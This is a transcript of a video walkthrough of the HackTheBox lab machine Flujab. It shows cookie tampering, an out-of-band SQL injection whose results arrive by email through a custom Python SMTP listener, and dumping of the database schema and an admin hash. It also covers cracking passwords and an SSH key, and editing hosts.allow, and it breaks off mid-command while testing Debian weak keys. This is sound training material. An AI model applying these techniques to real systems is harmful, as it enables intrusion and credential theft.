What's going on YouTube? This is IPSec, me doing Flujab from HackTheBox, which was a really fun but extremely difficult machine. The two main reasons it was difficult is the first one being the creator didn't want it to be intuitive at how to progress through it. He wanted to kind of be like the real world where there's a bunch of noise to filter through. So there's a bunch of just stuff on this box to throw you off the track. I can't explain all the rabbit holes because this video would be like 20 hours long, but I will show tips and tricks along the way, like using Aquatone to take screenshots of a bunch of pages at once so you can filter through them pretty quickly. The second reason this box is difficult is because the SQL injection is an out-of-band injection. You have to modify the SMTP server to point at your box because the output of the SQL injection will come at you in the form of an email. So that is a little bit difficult to do, but it is relatively straightforward once you know how it all works, which I'll do my best to explain. After that, the box is relatively simple to get a shell on. There's two different ways, we'll show them both. The second way I show at the end of the video is my favorite because it's taking a web application, reading the API, and using functionality in the API that's not in the GUI to do unintended things. So that is a really cool thing. And then the root of the box is just a simple screen exploit, and it kind of fits the whole storyline of the box of a flu vaccination, and the PrivEsc is a screening. So with that being said, let's jump in. Like every other box, we begin with the nmap with -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Flujab, and then the IP address, which is 10.10.10.124. It does take some time to run, so I've already ran it. Looking at the results, we have quite a bit of information here. The first thing I notice is SSH is open, but it doesn't have any type of banner. So what I'm going to do is open up a new pane or window, whatever this is called, and do SSH 10.10.10.124 and see what happens. The next thing we have is HTTP is on port 80. It is a 301 redirect, and its location is the HTTPS version of the website, and it's saying it is clownware proxy. And back on SSH, we just get SSH exchange identification, connection reset by peer. So let's go over there and copy this, and then go over in cherry tree and just create a node of it. So Control-Shift-N to create a child node, label it interesting, and we'll say SSH open, but there is a filter. So most likely there is something we can do on this box that will allow us to SSH. We're not even getting like a public key denied error message, so we don't have anything with SSH. It just closes us right away. So the next thing we have is HTTPS is open on port 443. The server header, just like on port 80, is clownware proxy. The HTTP title is direct IP access not allowed. And we have a ton of DNS names on this SSL certificate. So that is something to keep mind of. And there's nothing really interesting other than that. We have port 8080 that is open. Looks like the same thing as 443 with direct IP access not allowed and a bunch of DNS names. So let's go check out that web page. So let's go to Firefox. 10.10.10.124, accept the SSL cert, add exception. If you wanted to, you could do view, details, look at subject alternate names, and get all the names you saw in that nmap. So confirm security exception, and we just get a weird error message, and this is looking like a Cloudflare ripoff. So I'm guessing we have to do various host names. So let's go over to terminal, and we will copy all these DNS things, and then we'll do we'll do echo, paste all the host names, and then we can do sed, then search, comma space DNS colon, replace it with just a space, and do G, and then we have everything spaced out correctly. So I can copy this, go into Etsy hosts, we can create an entry for 10.10.10.124, and then paste all this. I don't want this wildcard, so I'm just going to remove it from my host file. And there you have it. We have a bunch of host names. The big pain now would be going to each of these and then viewing what is on the page. So we went to like clownware.htb, I think is one of them. And we have to click through this SSL cert a bunch of times to see what's on all the pages. So I'm not going to do that. And we're going to create a host file and take screenshots of all these pages. So let's do vi host.txt, paste this in, :%s, search for space, replace with a return, which is \r. And now we have a line for everything. And then I want to also add HTTPS before it. So I'm going to do QA to go in recording mode, I to go in insert mode, do HTTPS, and then escape to exit that, and Q to end my macro. And now if I do @a, it does that, and we have about, that looks like 9 lines. So I'm going to do 9 @a, and now we got 4 lines left, so 4 @a. So now everything has HTTPS before it. So let us install Aquatone. So let's do GitHub Aquatone, and I just use this program for doing screenshots. I found out about it because of a program called Natlis. If we search Natlis GitHub, I think it's by 0xDade on GitHub. Yeah, there it is, OXDade. But this is like a open source version of Shodan. So really cool, but let's go to cd/opt, git clone, Aquatone, and then let's just do the pre-compiled package because I don't want to compile it. So let's just download this, Aquatone Linux AMD 64, save file, move, downloads, Aquatone here, and then we'll do unzip, and unzip everything. It looks like we have /Aquatone. There we go. Do we have Chromium installed? I do. If you don't have Chromium, you can do apt install Chromium. See if it's updated. Sure, let's install this. Now that Chromium is installed, let's just do a symbolic link. Yeah. And opt Aquatone. We'll do user local bin Aquatone. And now when we go into HTTPbox's Flujab, we can do cat host.txt, pipe it over to Aquatone, and this will automatically capture screenshots using Chromium of all these pages, and then group it together in a nice HTML report. So let's open up Finder while that happens, or files on Linux. Come on. And then we want to go to root HTTP Flujab, or its boxes Flujab. Go over into HTML, or not HTML. We'll just wait for this to finish, and then we'll create the report. We could go into screenshots, and if we change this order into this, we can get snippets this way. But we should have this Aquatone report.html. And now we can close this window, and we get a nice looking report. So floral design, FreeFlujab.htb, bestmedsupply.htb, SMTP, and then a bunch of websites that look like trolls, Cloudflare, redirects. If we go show more, does that work? Doesn't look like it does. Click here. There we go. sys.flujab.htb and proxy is still like that. We have more. Looks like that report came pretty janky, but let's go to ones that look interesting. Let's check out bestmedsupply.htb. So let's click through this warning, click at exception, confirm, and then if we click by or info, we're getting a error message right now. We got redirected to clownware.htb, and we get an annoying page. So let's exit out of that, and let's check out another thing. So FreeFlujab.htb, visit the page, click through the cert warning. So we can close out of Aquatone because we probably don't need that anymore. And let's take a look at this page. So I focused in on FreeFlujab.htb because, well, the box is called Flujab, so kind of makes sense to focus here. We have link.php. What does this do? Just another, looks like a trolling page. So let's send this over into Burp. Make sure Burp is not on intercept. And the reason why I'm doing this is just so it logs all the pages we go to, because if I ever get stuck, I like going over to Burp, go to the target tab, and then I can just click here and look at various pages. So we have book, cancel, home, info, registration, remind, and stats. So let's go flu stats, I'm guessing is the stats. Yes, it is. And go look at this, scrolling around. Tons of just reading, and then we have some testimonials. So potential names of users. So let's go over to Cherry Tree, go up here. We can call this FreeFlujab.htb, and then do users, and we have A Chun, B Smith, L something, Fagola, maybe, and then J Walker. And this is on this page. Okay. So let's see what else we have here. If we go back over to Burp, we don't really have anything new. We have book, cancel, home, info, registration that we should view. And these are in light gray, which means we haven't viewed them. Black means we have. So let's go all the way back to the top of the page, go to patients, register, and we get a new patient registration form. So date of birth, let's just do 04, 01, or 10, and 1980. Whoa. 19858, sure. First name, please, last name, subscribe, NHS number, we don't know that. P subscribe at localhost.com, or we can do example.com. I don't think that goes anywhere. Phone number 555-555-5555. 867 I forget that song. Let's just go back to 555-123-4 867-5309. That's what it was. But we get must match a valid UK phone number. So 01272, then 3 to 8. So 01272 345678. Click register. And we get could not connect to mail server at port 25. So nothing really interesting there. If we go to patients, booking, see what we can do here. Preferred date, that's fine. First name was please, last name was subscribe. Let's request an appointment. Please subscribe is not a registered patient. So let's do, go to Cherry Tree. We have A Chun, B Smith, L something, J Walker. So let's see if we can do Johnny Walker. So Johnny Walker, is he registered? No, he is not. Let's do John Walker. And we get error cannot connect to mail server. So have a valid patient, but wasn't able to do anything. So let's go over to patients, cancellation. And I may throw these into something like SQL map as I keep going, but in sake of time, I'm not worrying about that. So this more tab goes to stats, this goes to info. And just before I clicked that, I looked up here and we had an error message not registered. So if we went here to cancellation, not registered right off the bat. So let's go and intercept the request to see exactly how it knows we're not registered. Refresh the page, go to Burp, send it to repeater, and we have two things. We have patient, and this looks like 32 characters, so probably MD5 sum. So if we echo -n, WC-C, 32 characters, and it's in hex, so most likely MD5 sum. This looks like base 64. So let's go to the decoder tab. Let's just do smart decode to unURL that. Decode this as base 64, and we get MD5 sum null. If we look at repeater tab, 122.696, 122.696. So this is the patient number is equal to null. Let's say instead of null, let's do true. And then encode this as base 64. And the last two are %3D still. So we can just copy this. And then we will go where registered is and paste up to the %3D. Click go. And we're no longer getting that redirect. It says 200 OK. Oh, wait. One error not registered. What was the page? Go to target. It is probably cancel. So let's go to get /cancel and see what happens. Still a 200 OK and something weird. Includes fortune.php, pathhandler.php, but something odd. Let's open this source in Firefox and we can get a better picture of it. So what I'm going to do is instead of just editing this every single time, I'm going to go to Firefox, press, I think, F12 to open up the developer console, go to storage, and then go to this registered cookie, and we can just edit this to be what we want. So now our cookie is saved. We can close this. And oddly enough, when I was in there, I saw a cookie I did not see in the request. We have this mod US cookie and SMTP_config, something to take note of. But now when we go to cancellation, we can turn intercept off. We get the page to cancel an appointment. So it says NHS number required. If we put something in, it gives us the format of the NHS number. So that was NHS-3 characters, 3 characters, 4 characters. So NHS-000-111-1234. Cancel appointment. And we get error cannot connect to mail server at port 25. So going back into Burp, let's go to our target tab. We have a lot more pages, but nothing really new. I'm going to guess $login because we had that page is not a registered user. So there's got to be a place to log in. I don't see it here. We could run it through GoBuster, but I could also just guess a page's login and see what we get right away to log out. So let's examine what this redirect request looks like. So if we do login, go to Burp Suite, intercept, go back to Burp, send to repeater, click go. Let's see. It is sending us to 302 found, set cookie, this mod US, and the path is SMTP_config. So we had a bunch of errors on mail server, and we have a SMTP config, so it makes sense to poke at that next. So let's copy this, click go, go here, and look at SMTP underscore config, and we get a denied. So let's open up Burp, intercept, and you get what we're doing here. So we got this registered cookie that I think is still the same one. We want it to end in ZQ because BA is null. So ZQ, if we go to proxy, ZQ, so this is still a modified cookie. This one is not though. So let's see what this equals. And it's only got 1% 3D. So I'm going to erase this one, paste it, decode as base 64, and we get configure equals null. Let's change that to true. And then, of course, encoded in base 64. It still just got one equal, so instead of converting that, I'm just going to copy this. We'll go into the proxy tab and paste this, and then click forward. We get mailer configuration. So what I'm going to do is F12 and edit this cookie in Firefox. Okay. And we get patient emailer configuration setting. Current setting is SMTP:25. Let's see if we can change this to our IP. So 10.10.10. Go to terminal. If config eth0. ton0. 10.10.14.3. So let's do 10.10.14.3. Click save. It must match a domain name. We could put a domain name here and then intercept it and change it, or we could just look at the JavaScript. So press F12, go over to inspector. I'm going to click this little pick an element, click here, and we can see what the pattern is, smtp.something.something. So if I just double click this, highlight the pattern, escape it, enter, we have now just changed the requirement of the page, and we can just save this config. So now we have the SMTP setting at 10.10.14.3, port 25, and then we have this only whitelisted sysadmin or authorized access page. So let's see what whitelist says. And we get denied. So let's go back, go over to Burp, intercept on. Let's see what the request to whitelist page looks like. We have patient, registered. We're not sending that mod US. So let's go back to Firefox and change the domain for it so it sends it on the request, because the path is to only SMTP config. So the reason I'm doing this is because this is the only other cookie I know of. So it's just a shot in the dark. Let us go back to Burp. We can redo intercept and now go back. Try this again, but let's intercept the request. And we did send it. So I'll go over to repeater. Is it going to redirect us to denied? It is, but this looks like it changed back to normal, which is annoying. So let's Control C, decoder. No, we don't even have to. We got GW right here. The good one we want is WU. We go to the proxy tab, and it's like that. So let's go over to repeater, decoder, copy the configure equals true one, and see if we did this, if it would fix it. So let's go here, paste, go, and now we get a 200 OK. So that is definitely the issue. We can see allow 10.10.14.3. So what I do in this case is I'd probably go into Burp, options, and match and replace. We want a request header. We want to match the bad one. So let's go back to decoder. Cancel decoder. Let's just copy both of these. So this is like this. and then go to proxy, match and replace, request header, and we'll match and replace and burp automatically. So this will be mod US cookie. Click OK. So now Burp will automatically do that replacement for us. So let's try this again. So let's go to SMTP config, and we get denied. So I screwed something up. No big surprise. Go to history, look at this. GW, and again, we want the WU. So what did I do? Go to options, request header, search for that, replace with this. Why did that not go? Request body? I don't think that would be it. Body doesn't make much sense, but we'll try it. Click go, denied. So it's definitely going to be request header. Oh, I have a space. So I deleted the space and then clicked here, which then put the space back in. So I clicked back up there. So now we don't have a space. That was an annoying bug. So let's go here, SMTP config, and now automatically searched and replaced. If we go into our history tab, go here, we can see the auto modified request. So look at mod US GW, auto modified to WU. And now if we go to whitelisted, we have the allow 10.10.14.3. So now let's try to go over to patients. Let's see. I'm going to do booking. And it was what? John Walker. And then we need to do netcat LVNP 25. Click request appointment. Go back to terminal. We get a connect, but we don't see any data. And that's because our SMTP server, or what's listing on port 25, isn't sending the right stuff. So let's do python-m smtpd-n-c debugging server 25. And this is just like simple HTTP server, except it's going to be for SMTP. So mail error, following address failed, try to email. So let's go back here. John Walker, terminal, and we get an email. So looks like it's scrolling down. We got too much information. So we got this ref, and then vaccination information. So at least we know what a valid NHS number is. So let's go over here. Oh, that also gave me a JavaScript pop-up of the email of John Walker. So that's interesting. Let's do cancellation, NHS number, cancel appointment, and see what this sends. Your Flujab appointment has been canceled. Have a nice day. And essentially the same thing. We got the header of the email and whatnot. The most interesting thing I see here, though, is a PHP mailer version. So let's just go over to exploitdb or search exploit, PHP mailer, and the version was 5.2.22, and it doesn't look like it is vulnerable because we don't have any versions here. So moving on to what else we could try. We can try doing like SQL injections. So let's go back into the page and let's do this NHS, go to Burp, intercept on, cancel appointment, send this to repeater, and let's try NHS, and then a single quote. Or let's do what a valid response is real quick. Click go. We get 5366 bytes. Do a single quote. Click go. We get 4633. So we definitely have something here. So let's actually see what this looks like. So before I edit and send, take a look at what this page looks like. Add that bad quote. And nothing really different. So I'm guessing the thing you get back is probably some type of JavaScript of an alert telling you your appointment's been canceled. So let's see if we go back into repeater. Let's add a comment, which is dash dash plus dash, or two dashes and then a space is a comment. So click go. And we get that 5,000 bytes again. So right off the bat, I'm thinking we have SQL injection because it obeyed that comment. So let's try plus or 1 equals 1, and then a comment. Or we can probably get rid of this NHS number. If I let this in, we'd probably have to do an and, because this is true, and then this would be true, if that makes sense. I want this left side to be false. So the or 1 equals 1 will translate to a success. So click go. We get the 5,000 bytes. So let's try or 1 equals 2. And we get 5,000 bytes again. So that is odd. Let's try 1 equals 3. Come on, 5,000 bytes. That's not right. Get rid of NHS completely. Click go. Maybe I was wrong there. Let's do a invalid thing. So we're still getting 5,000 bytes. So, not sure what happened. The demo gods. That's what happened. So this, click go. 5375. Click go. 5372. 5378. So something changes. Message successfully sent. And we get this cow. So if we do 1, let's see, we get message successfully sent. Let's click Oracle. So it looks like that may be some type of random thing, that cow. Redis. And we're also getting successfully sent. So that's annoying. If we go to this terminal tab, we see this referral is nothing right now. And if we put a valid NHS number, we do get a referral. So that is how we can identify bad request versus good request. So do that, no referral. So now we have some type of Boolean. We can't use this page because of this thing that just keeps changing the bytes that I guess I missed. So let's do single quote plus or 1 equals 1, and then a comment. Click go. And we get a reference number. So let's do or 1 equals 2. And we don't. So there we have it. We have Boolean injection right there, and that's proof. So if the SQL can pull a valid reference number from the database, it puts it in the subject. If it can't, it will still create the email, but it just won't put a reference number, if that makes sense. So let's do burp and try a union select. So union select, and we can type this without HTML encoding first. So union select 1, and then the comment, highlight everything, Control U to HTML encode, click go. And did we get anything? Looks like we have that, but nothing really changed. Oh no, we haven't got the email. It's not even sending the email right now. Union select, comma 2, click go. Because we should have this reference change. So something happened. Let's go to SMTP config and see if we're still pointed at the right spot. We can turn proxy on. Still configured to mail to us, but we're not getting any response. It's still set that or 1 equals 1. So maybe if the SQL command errors out and it's unsuccessful, then it doesn't send the email. So let's just keep going on with this union injection and see if we can figure it out. Equals 3, click go, nothing. 4, nothing. 5, and we get an email back. So we can see our SQL command here, and then this reference is 3. So this third spot we can control. So if we put a please subscribe here, click go, we have the reference is equal to that. So instead of putting a string, we can just do like version, click go, and we can get the MySQL version. So we have a relatively good way to do data exfil out of this database. So let's begin looking at the tables. Actually, before we do that, let's instead create a Python script to make this output a bit prettier, because right now if we do it, we'd have to keep doing a bunch of alt tabs, and then we'd also have to work in this burp window, which has HTML encoding, which makes this just overall hard to read. So let's do a Python script to make this all easy. So let's, we can exit this window, but let's do v cancel appointment.py, and we'll have to start the script. So first, we'll do from SMTPD, import SMTP Server, and we can go over to Firefox. Let's turn intercept off so we can Google. It is off. And we can say SMTP Server. You do a bunch of Googling for how to do this, but there is a process message thing that gives you how to do this. So you just be reading these Python documents to learn how this server works. So if we do that, we'll need now a class email server, SMTP server, and now we can define this message, process message, self peer mail from rcptos data kwargs, and I think it has all this. It doesn't have that kwargs here, but this is the Python 2 documentation. If I go to Python 3, I think it will. Yeah, so this is the one I'm doing it with. And then debugging server, this was that -c. So if I did -c and just specified SMTP server, it would have worked, but wouldn't have given us the output. The debugging server does that. That's why I did -c debugging server. And it says arguments are per, messages will be discarded and printed to standard out. So if you read all the documentation, it explains how this works. But we're creating this class, defining process message, so we can redefine exactly how it processes messages. So response is equal to data, and we need, that should be fine. And then we can print data, And then we need to get out of here, def mail, and then email server 25. This is what to listen on. And then for some reason, it has a remote host. This is for forwarding things. So if we look at this documentation, SMTP server, local address, remote address. If you search what remote address is, it is an address to forward mail to if you want this to be like a relay server. So none says don't forward. And then we need, not sure if we need the async core loop yet. Let's do that. Async core, and we have to import this. So import async core. And we'll also do import threading. So now we can do threads, and then t is equal to threading.thread. Target is equal to mail. Mail is this function. Threads.append. And the reason why I'm doing threads and all this is because not only do we have to be able to read email, we have to be able to send messages. So this is a skeleton exploit to start that. So now we can do while true. CMD is equal to input. Please subscribe. And then we will print CMD. That's fine. So if we do Python 3, cancel appointment. If we do test, it does that. If we receive an email, is it going to print the message? It is. This is Python 3, so it's going to be encoded by bytes by default. So let's fix that by saying response is equal to string and UTF-8. So start this, click go. Okay, we got, did that do what we wanted to do? I don't think so. Response, oh. There we go. Go. There we go. So now we're printing this message. So let's do a search and replace for this. So let's import RE for regular expressions. And now we can do data is equal to re.findAll. And then dash, what is it? I think it was dash space ref. And we want to match everything. Like that. We need to say we're searching response and grabbing the very first match. So what this is going to do is it's going to take the variable response and search for the string, and then the very first match is going to be what's between these parentheses. So now we can print, instead of response, we can print data. Go here, click go, and we print the database. So that's good. Let's just print a blank line so it's a bit cleaner. Okay. So let's see. What do we do now? We have to make a inject loop, but before I do that, let's improve this little looping thing, because right now, if I do something, I don't have this up arrow and I don't have left and right, so it'll make it a big pain to type in the future. So let's do import CMD from CMD, I think. And we can do class terminal object. I think prompt is equal to please subscribe. And then we need, was it do, or just def default, and I think that's self args, print args. I hope that's right. And now we can do t is equal to terminal, and then we'll call it term, and term.cmd loop. I think that's how you use this module. Python 3, we need from. Not from, import. From cmd, import cmd. I think I said it right. Terminal has no object cmd loop. Let's see. Is it cmd line? Python cmd loop terminal. So we can find this module real quick. Let's see. CMD module. Where is the import statement? From CMD. Let's just try. Oh, I see it. This isn't supposed to be object. This is supposed to be CMD. There we go. And if we type stuff, we got that working. So now let's do a definition for inject self args. And this is going to be the Python request module. So let's do payload is equal to f, and then we'll do args. I probably don't need the triple quote. I do triple quotes by habit because then you can do double quotes without it breaking out of things, but this should be fine. Args, like that. And now if we print or return payload, and we call this self.inject args. If I didn't screw that casing up, see if this works. We need a print. Print. There we go. So now we have SQL. So let's do import requests and make this inject actually send a request. So data, this is going to be the post data, is equal to, go over to Burp, grab all these cookies. Oh no, the post data I said. Let's grab this. For now, put a comment, data, nhs_num is equal to, this is going to be payload, and then submit is equal to cancel appointment. Okay, that should be fine. Now we need cookies, and this is going to do a similar thing. Let's go over to decoder, smart decode, copy. And then let's actually just paste it in and edit it. So cookies is equal to patient, then this MD5 sum, then registered, that base 64, then mod us, like that. I think that's good. And now we just need r is equal to request.post https freeflujab.htb/cancel. And then data is equal to data to send that. Cookies is equal to cookies to send that. And I think we need verify is equal to false. And that's SSL verification. So we don't need to do that. We don't need to print. We can just inject args. Python 3. And let's do union select 1, 2. Please subscribe. 3, 4, 5. Inject not defined. This needs to be self. And we will have this print a debug statement of payload. Union select 1, 2. Please sub 4, 5. And we have the server respond to us with please sub. We have this annoying banner. And we can see this is the actual payload we sent to the server. So by typing this union select, it put it in between all the needed things to do our SQL query. So let's do Python 3 request ignore SSL hide warning. Let's see. Here we go. From request, put that here. And I'm not sure if I have to do anything. I do. We need to go down here and does this have like a request dot packages? There we go. This is the syntax I want. Paste. Run this. And let's just scroll up to copy what we wanted. So let's copy this, paste, and it's working perfectly. So let's just take out this one statement we did for debug. So it's no longer printing back to us. And now if we do version, it's good. The only thing I don't like is the blank line before the output. So let's go to the process message and move that down. Paste. And there we go. Now that's perfect. So we can do version. And we get that. So now we have to actually export information out of this database. And the first thing we need to know is the actual database names. So MySQL has this information schema table. So this holds all the information about how all the databases and tables are organized. So it makes a really handy thing to do SQL injection with. I always go back to this page on how to do it. So the first table I want to look at is schemata. So if we look at the structure of this, we have a schema name in this table. So let's do the union injection we had before, and we want to put the table name here. So this is going to be schema name, and then over here we want, we need group concat. So this will take multiple results and then just display them all. So, and between them, I want to put a comma. So, from information schema dot schemata. Click go, or hit enter to go, and we have all the tables. So we have med staff information schema, and it doesn't look like, or it looks like we don't need this comma. Looks like by default this group concat separates by comma. So we got med staff, information schema, MySQL, open NMRS, PHP list, and vaccinations. So let's go over to Cherry Tree and create a new child object to do SQL dumping. And we can do databases, and we have, let's just copy, and then put them all. So 3 tables I know are default. There's this performance schema, MySQL, and information schema. So I'm not really too concerned about them. I'm concerned about these top 4. So let's do another query to dump the table names out of each of these. So we can do group concat. Instead of schema name, let's go back and go into the tables. Where is it? Come on. There we go. Information schema tables table. And we can look. We got table name, and it's also got table schema. So we can do group concat table underscore name, comma, colon, table underscore. Actually, let's do schema first, and then table name. From information schema dot tables, where table schema is equal to med staff. If I didn't do this, it's probably gonna be too many tables because of this information schema and MySQL table and performance. So that's why I'm doing it this way. I don't know why I decided to do this group concat with table schema if I'm selecting the schema here, but that's how I did it. So let's go here. Cherry tree. I guess it makes sense when we do this. Tables. It's going to be a pain to highlight. In reality, I'd have the font like this. But for videos, we have it all the way up here. So let's go back to terminal. And we can do where table schema is equal to the next one, which is open NMRS. And you get OPENRS. I think I typoed that. Let's see. Where table schema is equal to this. Oh. Let's hit up a few times. Go back to this same command. That works. Unit select group concat table schema table name from open NMRS. So maybe that table we can't read. So let's, or that schema. Look at them again. We can try PHP list. So maybe it's this error message if we can't read it. Or maybe it just has too many tables. The output's too big. So let's see. We can verify that by shrinking the output of our command. So where's that open NMRS? Let's only do table names. Because I'm sure there's some limit to the amount of information you can put in the subject line. And we may have hit that. Maybe not. We'll just move on. So the last table is vaccinations. And that's a table we need. Did I typo this? Or is some failing? Table schema, vaccinations. This is weird. Go here. table schema. There we go. So yeah, it must be just too much input, because if we had this table schema, table name, we get error message. So it must be max number of characters you can put. So you may have to break these in multiple requests and do like a substring query and export it that way. So this table below table is vaccinations. So let's see. To save time, instead of dumping all of these, I'm going to just focus on the vaccination table, which I know is beneficial. And I don't feel like separating all this. Let's just see what's in this admin table. So going back here, you can guess it. There's another thing to go to columns. So if we do columns, we can do information schema columns table. And we got table name, column name, table schema. So go back here. Our group concat is going to be column name from information schema dot columns, where table schema is vaccinations and table name is admin. Let's try this. There we go. We have the vaccinations table information. So vaccinations, admin, and I have a better way to do this. The temp, paste, %s, comma, \r, n. Whoops, it was G. Paste, %s, comma, \r, G. Okay. And then, hate copying in visual mode and VI. I think it's V highlight plus, nope. Let's just save cat temp and copy. So let's see. Let's see if we can get all these tables. So we can copy this again, go up, and we'll do group concat, paste, and after each of these tables, we can see. There's a better way to do this. There's always a better way. Go back into VI, paste, %s, replace comma with a comma, then colon, comma. That looks good. Cat temp. There we go. That's not what I wanted to do. And the command errored. Let's just do this. Column name from this game, yes. Let's just select all these. Oh. I know what I did wrong. So we have this with all of the things. We're no longer in information schema. We're in vaccinations dot admin. Is it case sensitive? I think this is right. Let's just select ID. From vaccinations.admin. There we go. So I wonder if it's case sensitive. Or maybe there's a typo there that I just am oblivious to. So it doesn't like all of this. So let's do ID. We can do the next one, which is login name, sysadm. So let's see. If I copy everything without this, will it work? If we go up here, or is it this? Paste. Nope. So let's do them, I guess, one at a time. Not sure why this isn't working. I wonder if there's one of these columns we don't have permission to or something. Login name, sysadmin. Next thing is name LC. And we have administrator. Then we have email, Flujab.htb, access, and we get another host name. So let's do ID, 0, root, name, sysadm, name LC was administrator, email, sysadm at Flujab.htb, access is this DNS name. Let's do created. So these are date timestamps. I'm not going to worry about them. Password. And we get this. So I'm going to stop copying all this because it would be a waste of time. But let's see what this password is. So we can go down here, echo-n, paste that, wc-c, 64 characters. So let's see. Do we have hash identifier or something? Hash-identifier, paste, paste. So list of possible hashes, SHA-256. So that's probably going to be the most likely. Out of all this, it's kind of what I am most familiar with. So if we do hashes.org, is there burp and intercept? It is not. Let's see if we can search this. We could use hashcat, but this would be a bit quicker. btk ddj6. And it is not in here. So I guess we'll have to move over to hashcat. So let's go to my cracking machine because I hate cracking in a VM. So let's go cd hashcat. I can type vdict v hashes, and we'll call this Flujab-SHA-256. Paste it. We can do /hashcat example format, I think. Formats. Hashcat help grep-i example hashes grep-i SHA, and let's see where SHA-256 is. So let's see. There it is. So we can do less, search for this, and it is mode 1400. So let's do /hashcat -m 1400 hashes Flujab and opt word list rocku.txt, and let's see if this cracks. And almost instantly, we get it as the doctor. So let's go back over to Cherry Tree, and we can do password, the doctor, and then put in parentheses this. So we have a new page, sysadmin-console-01.flujab.htb. So let's go into VACCINATIONS hosts and add this here. And we can also go to like smtp.flujab.htb and try those credentials. So SMTP Flujab.htb. And we can try sysadmin@flujab.htb from email. And the password as the doctor. And it doesn't work. If you look at the source code for this page, it says it's now deprecated and all the integration is on the free service application. So this page doesn't work, but if we go to the new domain, this will work, hopefully. So HTTPS, go here. Direct IP access is not allowed. Let's try port 8080. And we get access denied. So one of the annoying things about this box is this page requires access to that whitelist, and that whitelist may have got erased. So let's do FreeFlujab.htb / SMTP config. Denied. Oh my god. Why is it denied? Intercept on. SMTP config. Look at mod US. WU, I think this one was good. Maybe my registered cookie changed. Copy this, decode, base64. Decode as base64. What? Decode as. Did I not copy? I did not copy the whole thing. That explains it. Q. Config is equal to true. So let's try this registered thing. Maybe this cookie expires and it got set again. So this is 2 equals decode as base64. It's equal to null. So let's do the same exact thing that we did on the previous one. Is set something to always set this cookie. So request header, match that, click OK. And then let's go into decoder, change this to true, encode as base64, and replace it. Edit, paste. So now, hopefully we can go to this SMTP config. Looks like we can. If we click on whitelisted admins, denied. I'm guessing the mod US is not here. So let's go back to Firefox. I wonder if something cleared. This is weird. Go back to storage. It should be sending the mod US. We still got that on path is equal to everything. Burp, intercept on, whitelist, patient. It's not sending mod US. Let's go. Where is it? Should have an SMTP config. Okay. Request. Let's grab this. Go here. Paste it. Forward. denied. Okay. So what I'm going to do is I'm just going to add this again, because we did this once before and it worked. So instead of troubleshooting, we're just going to assume if I edit this, take this pattern out, do 10, 10, 14, 3, save it, and we go to HTTPS sysadmin console 1, port 8080. Let's clear my cache. Maybe it's a cache thing. Clear history, clear everything. HTTPS. It's already there. Port 8080. And there we go. So I think I had to clear my cache. But now we get to this Ajenti login page. So we can do sysadmin, and the password was the doctor. And when we log in, if I could type the password correctly, I think that's what I typed. sysadm, I think. Yeah. Log in. We get a page, hopefully. So we get this application. It looks like it is going a little slow. Is Burp on intercept? It is not. Click on plugins, super users required, dashboard again. It's loading. There we go. We can see the uptime of the box. Go to settings, super users required, Notepad. If we go to open, and we can do like etc hosts, we can see it opens this file on the remote server. So the first thing I did was try to go into root. We can't. Let's try figuring out what user we are. So let's go to proc, then self, and I think it's environment, or environ. And we get an error message, so we can't view that file. Let's just go to home, and we have a bunch of users. So let's see what's in these files. A user.txt, bash.rc, profile, nothing in that one, nothing in this user. Just keep going. And we have something in this user. We have a .ssh file. So we got authorized keys and user key. So let's do authorized keys. And we have shell whitelisting plus key auth enabled. So if we go back, the shell, interesting. So we need SSH key, but we're connection reset by peer when we try to SSH into the box. So we got shell whitelisting. So if we go open, etc, and then let's try, if you just know how SSH can be configured, we have this host.deny file, and we can see SSHD is blocked. So if we go to etc and host.allow, we can do SSHD 10, 10, 14, 3. See if we can save this file. We can. And now if we try to SSH 10, 10, 10, 122, will we get anything? No route to host because the port is 124, or the IP is 124. Connection reset by peer. Let's just do all 10, 10, 14, 3. Save it. Try it again. And we get a banner. And then when we do, we get immediate permission denied public key. Even if we tried like sysadm, we'll probably get the same exact thing. So let's go back into the home directory of Dr. No, where he had that authorized key file. So we can grab .ssh, authorize keys, not that one, home, Dr. No, SSH. Is this user key the private key? Looks like it is. So let's copy this. We can do make dir Dr. No, nv private.pem, paste it, and then I think it's like SSH to John. Do we have it on Kraken? SSH to locate SSH to John. What's the script? Locate SSH to John. There we go. It's just not in my path. So we can copy this. And then we want to put the private key file. So this will be private.pem. Copy this. And then we can go back into the Kraken. cd opt John. We can do vroot. We'll do flujab.drno.ssh. Paste. /John. Root flujab.drno.sh. -- word list is equal to opt word list rocku.txt. And we get the decryption password is shadow troll. So if we try this key, the first thing we have to do, chmod to 600, and then ssh-i private.pem Dr. No at 10.10.10.124. Put the password of shadow troll, and we still get permission denied. So what we can do is ssh- I think key gen -y for yes, -f for file, put this key, paste, and this will be the public key for this key. So if we go open, go in his home directory, .ssh, authorize keys, we can see MAXE is how that ends. This is not the key to this thing. So I'm guessing this one key here is just a troll, since the password included troll and the public keys don't match up. So if you do this every time, we can see, whoops, shadow troll, it'll come out to the same thing. So let's keep poking around the box. Let's see. I want to go to Firefox. We could go examine other home directories, and there's two ways to get a shell from here. We're going to do the first one, and we'll do the second one at the end of the video. So the way I think most people probably did it was poke around the SSH config. So if we go to etc sshd, or is it just SSH? We get this deprecated keys directory, and you'd be going here to look at this sshd config. And then you can see exactly how it's used. We got this authorized key file with a extra file here, which will be handy later on. So sshd, paste that. But let's go check out that deprecated keys directory. So etc and SSH, deprecated keys. We got a few keys. We got this README, and says copies of compromised keys will be kept here for comparison until all staff have carried out PAM updates as surgery security notification email. Do not reuse any keys. So there was some type of key compromise. If we do open etc, I think it's issue, we can see this is a Debian box. So I just found this in the OSCP labs a long time ago, and it kind of rang a bell. So if we Google SSH Key Compromise Debian, I think, we go to this repository from Got Milk, and essentially, see if he says the dates here. Debian announced all SSL and SSH keys generated on Debian-based systems between September 2016 and May 2008 may be affected. So during that time, Debian created a lot of weak SSH keys. So let's clone this repository. So git clone, and then let us go here, open, what is it? Nope, it's Etsy. Up one, Etsy, SSH, deprecated keys, and you'd grab each of these keys. I want to say from memory it is this key, and I don't feel like going through that menu 100 times, so I'm going to work under the assumption it is this key. And then if it's not, then we'll grab other keys. It's just a waste of time to grab them all. So make dir, we'll do keys and v key.pub, paste this, and we want to do SSH keygen -l-f, I think, for fingerprint, key.pub. And we can see this is a SHA-256, 4096-bit. So if we go into this repository, we do ls common keys. We have Debian, SSH, DSA, and RSA, but 2048, and we're 4096. So we're not on any of the common keys. Let's go Debian, SSH. Let's go to uncommon keys. And we have one 4096. So let's extract this. Tar, that is BZ, so 